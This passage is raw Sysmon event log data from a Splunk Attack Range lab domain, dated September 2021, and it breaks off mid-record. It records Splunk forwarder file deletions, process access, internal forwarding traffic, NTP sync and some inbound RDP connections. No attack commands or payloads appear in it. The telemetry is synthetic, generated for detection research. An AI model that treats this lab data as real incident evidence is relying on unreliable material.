09:09:56.124{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.124{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8A64-6151-2A7A-00000000FC01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.123{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A64-6151-2A7A-00000000FC01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:56.108{5EBD8912-8A64-6151-2A7A-00000000FC01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:57.891{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ECC6B3E1C27C09A0032815CCAE7AAE2,SHA256=569679638B7F015F1DEA2BB6CA320D8A20FC5673D19B2A4EEC5A822910E68EE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978438Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:57.486{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA9BEE270D678E79CD5A166215127A79,SHA256=380BA402E1139E4A79D2B899D03097FA659B5AC5EA8E5B7548E22B608D939968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:58.906{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8887B233A0A6B700A9CC8FA6618127D,SHA256=293D1736426610A3FBB7C3DF29A508B10CB99B7B59C4E0BE8E6F42049D8856EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978439Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:58.486{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF6B6955201CFD4DCE21E6385BF9A3E,SHA256=14C10B38E824DE2CB38EB3EF4EECDDBCF748BF92CF3190D3FC2640A409033CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:59.924{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E72A7458B37006778F3039D9B9AD983C,SHA256=B70E37C2A87A1A62352E4714AF27990F6E3F875C7BF6036C285C768673E4728C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978441Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:55.770{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59362-false10.0.1.12-8000- 23542300x8000000000000000978440Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:59.501{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=538B39634FEF87CD504B19FF27C963E8,SHA256=B8A970311C9D5AA61DF1BF4FB1BE54E60DE2ED9F553DD760258A7E884C3B18F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:00.942{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19EFBE45EAA0AC49F114522189BA9BCA,SHA256=788F324F350E2DF960551B01505EB97894049D7D6C290AC9F0BC0708DA6C1D7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978443Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:00.661{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4306MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978442Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:00.503{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B5608AFB3102B53B56AE027D21C1ADD,SHA256=47DBBB475B7D19FE2C59772B39CE08B141BA0489051013853965419B359A8214,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:01.958{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D115392B7F112036B492AB3A5F71B442,SHA256=2B2878DEF854FB7D873514C0685559543F517E62753BD35AFCA68240CACB5411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978445Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:01.675{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4307MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978444Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:01.518{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA828C2BC06B8C52930F3643938E2574,SHA256=DD081AFB265D095D2608C72EBBFF77BE1350C4960C0D16B5456507E074D3A552,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:59.734{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53339-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:02.959{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84E9C7695127155E0515286BF5B1CDC5,SHA256=7186848BDFFDC5C7F3A1F780337E0469DAB08B99A7361E1051CD1566AACAD268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978446Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:02.519{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B8BF1E8244681D7EAB1371F7DB45827,SHA256=AB3E606BE2ECB13964A6AF0AD09E9D84A096290BEEE692FB84CA5EBFD1AA2E21,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:01.015{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60644-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:02.658{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=022EE5AD260DE1F9E4174D1524D64EEA,SHA256=5E1AE7B7E46A257522FDB9D995416CC3DEB28344D93386CF41CBB80476FED08C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:02.658{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA6AC33A944E4C3B6ED920949A433C3F,SHA256=82A59CAECEF664E5F1FCB5AC47459EAF3F75592E417219CF8DD0C58A6524A0B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:03.974{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE89922DF9739406F4B3BDA5907BDEBC,SHA256=8BCC84B0782566DB27E66C655B5D68FDCB0FCBFD769DC975B9715125DBAC8F44,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000978448Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:10:03.926{69CF5F33-7F28-614D-1100-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b37f-0x7533c2f9) 23542300x8000000000000000978447Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:03.519{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9A784C98F51769A2F1B5373CE279BF9,SHA256=E0864D664B7F3A4FBE32CA3EB75B2A25A94EA58186265234F8B4C93521031513,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:01.620{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64845-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000978450Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:01.772{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59363-false10.0.1.12-8000- 23542300x8000000000000000978449Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:04.535{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFB59A7AAAC30250BE988631B952DAA8,SHA256=C946FE37A7257273B884DD71B4898B09B8FBC9030B2736117C30857980917AFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978451Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:05.535{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E15B4EEB52860C308F8DC60441541A2,SHA256=51CA84A832F6D677C9DDB14BC7E6C74733A937A08B241ACC7903F07D397A37B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:03.616{5EBD8912-7F30-614D-1100-00000000FC01}404C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-429.attackrange.local123ntpfalse10.0.1.15-123ntp 23542300x80000000000000001049830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:05.005{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B90585725B5E2531A55F0766957CEB0,SHA256=64D48E4FF51BF982FA2E0BF6149F7D01F62255A0E689E34D92475FD495518605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978454Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:06.535{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2018798782B51457CE03FF4E5F6DEE56,SHA256=2BB96C1295E4A4A3D03810913D61301A9A72627855F32829A28873B52E82FCC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:04.912{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53340-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:06.024{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99B6AD5C84DBA44DEE87F2AD874E1E2B,SHA256=CEBE3AAF3BD90ADDF46F4B42CC99893D18DD388C9DD51A6F713BF9C0A410DEF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978453Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:02.553{69CF5F33-7F28-614D-1100-00000000FD01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-542.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x8000000000000000978452Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:02.553{69CF5F33-7F28-614D-1100-00000000FD01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-542.attackrange.local123ntpfalse10.0.1.14-123ntp 10341000x8000000000000000978458Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:07.707{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978457Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:07.707{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978456Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:07.707{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000978455Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:07.551{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=714C6D019F1303AE6A3E7D416F4D0A76,SHA256=43E6AA78EF4DD46524015C4B42936C839344FCD9E60A4B1B366ED9CC27BE78D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:07.042{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D7703C9E1FA86CBB8E88C009981AC23,SHA256=829E0E7CC8AC032F6BC01D9D31BE11C26DE3877904C204E8F8CB71A04A14F963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978459Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:08.566{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60DB35F3594A53DA14142014AB4AB433,SHA256=5F67D7D16FDD83CDF91E6B0FDD8595263E8357376146CAC4C7EFDC9875ECB135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:08.044{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB840945C1AE098F457F80CAC00755C3,SHA256=C5FD77FD9F6669B3FEE0C15C2827B8CA0AB1069D39F90864189FBF99259EC9F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978460Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:09.566{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23B8AF8B3E1F9E1E854819677E31B12D,SHA256=ABF2E027F34DB69A16947996505FCB142D532E87979A169FB3CABFC6E77ADA60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:09.045{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B786395B122D46C6C5CF1654D8BADE88,SHA256=F97F94B73FCA178752B5D7E7D62AB2AF7E3DC54B26D8B1A6125BA80DA0C788C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978464Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:10.566{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B46A0EAA301C50F8661906E01300E7D0,SHA256=22FC7AE9B1A97CCDF079FD5FAB4B79E3B30DC6D79C18D3D5B34E97245E3C4665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:10.075{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 